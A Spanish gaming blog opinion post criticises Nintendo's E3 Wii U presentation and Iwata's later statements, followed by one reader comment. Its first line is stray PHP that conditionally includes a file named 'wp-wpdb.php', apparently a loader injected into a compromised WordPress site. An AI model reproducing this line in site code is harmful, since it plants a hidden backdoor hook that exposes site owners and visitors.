if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Nintendo "Indirect" – La Fortaleza de LeChuck

Nintendo "Indirect"

Después de tener un Nintendo Direct pre-conferencia del E3, todos creíamos que la conferencia de Nintendo iba a ser tan grande, que no les cabía y tenían que dividirla de esta forma. Tristemente nos encontramos con la realidad de que esa conferencia no estaba encarada hacia nosotros, quizás más bien a la prensa no especializada que les sorprende cualquier cosa que anuncies que sea una propuesta diferente a coger un mando con botones con las manos y no sea para jugar con la familia.

Desde entonces, desde esa conferencia, Nintendo que se las prometía muy felices, ha visto como el mundillo rechinaba ante su nueva propuesta. Y quizás no tanto por la propuesta en sí, sino por la poca nueva información valiosa que se pudo sacar de sus conferencias, y por la falta de algunos juegos o anuncios que muchos esperaban.

Como sabéis la política de Nintendo cambió hace unos meses, a solo mostrar juegos que estén cercanos a su llegada, para levantar hype en el momento oportuno, cuando el juego se pone a la venta. El problema es que ahora sin el típico tráiler de Zelda de turno, las conferencias quedan bien sosas. Aunque tardaran tres o cuatro años en sacarlo desde su anuncio, el tráiler siempre ha sido un salvavidas para que todos babeáramos por sus nuevas consolas.

La cuestión todavía tiene más tela que cortar, pues viendo su error y la bajada de sus acciones, Nintendo ahora no para de bombardear con noticias a medias, sin decir nada y diciendo algo, sobre Wii U, para que ahora sí, los importantes, los jugadores, los nintenderos que han perdido la fe, vean que el proyecto tiene cara y ojos.

Respecto a ella «Iwata says» varias cosas. «Wii U estará abierta al modelo Free to play, aunque juegos First no habrá ni uno de este tipo«. «Los títulos mostrados en el E3 solo utilizan el 50% de potencia de Wii U«. «SmartGlass de Xbox 360 solo ofrece una pequeña parte de todo lo que será Wii U«. «Miyamoto tiene muchos proyectos pero están pospuestos por falta de tiempo» (entre ellos pretende hacer algún día un FPS).  «Zelda Wii U está en fase temprana de desarrollo, buscando nuevas formas con el mando de Wii U«. «El precio de Wii U será una sorpresa agradable«. «Xbox Live y PSN llevan demasiado tiempo para ponernos a su altura«. «Creo que no habrá mucho salto técnico la próxima generación de consolas rival, porque aumentará los costes y el trabajo«. Y así seguirán durante un tiempo, defendiendo Wii U respecto a las, claramente, más sólidas propuestas de sus rivales, cuando en realidad, lo que nos importa que son los juegazos que sólo Nintendo es capaz de sacar, están esperando a que Wiifit, Super Mario Bros Wii U, Just dance, etc, tengan su momento en solitario en el calendario.

Un montón de noticias que podían haber tenido cabida en las conferencias, y que ahora se apresuran a lanzar para defender el futuro incierto en su próxima consola de sobremesa.

Está claro que lo han vuelto a hacer mal, no se porqué han creído que el E3 es para la prensa generalizada, pero precisamente creo que éstos tampoco podrán vender la propuesta de Wii U hasta que más gente la pueda probar, porque no creo que la idea sea tan «casual» en realidad, como para levantar la expectación que levantó el mando de la Wii original en su día.

Publicada el
Categorizado como Opinión

Por Museboy

Como la mayoría de vosotros, crecí jugando a videojuegos y ahora intento transmitir toda la pasión por este mundo en La Fortaleza de LeChuck. También busco ofertas de videojuegos. Seguidme en Twitter y sabréis de qué hablo.

2 comentarios

  1. Nintendo y todas, están usando el E3 como un gigantesco anuncio de televisión que llegue a los telediarios y todo, y lo han conseguido. Hasta mis padres se enteraron por la tele de la conferencia.

    Para las "noticas para gamers" ya tienen notas de prensa y el Nintendo Direct.

    Aunque vamos, a mí tampoco me gusta el enfoque actual, pero si les salen bien los negocios

Dejar un comentario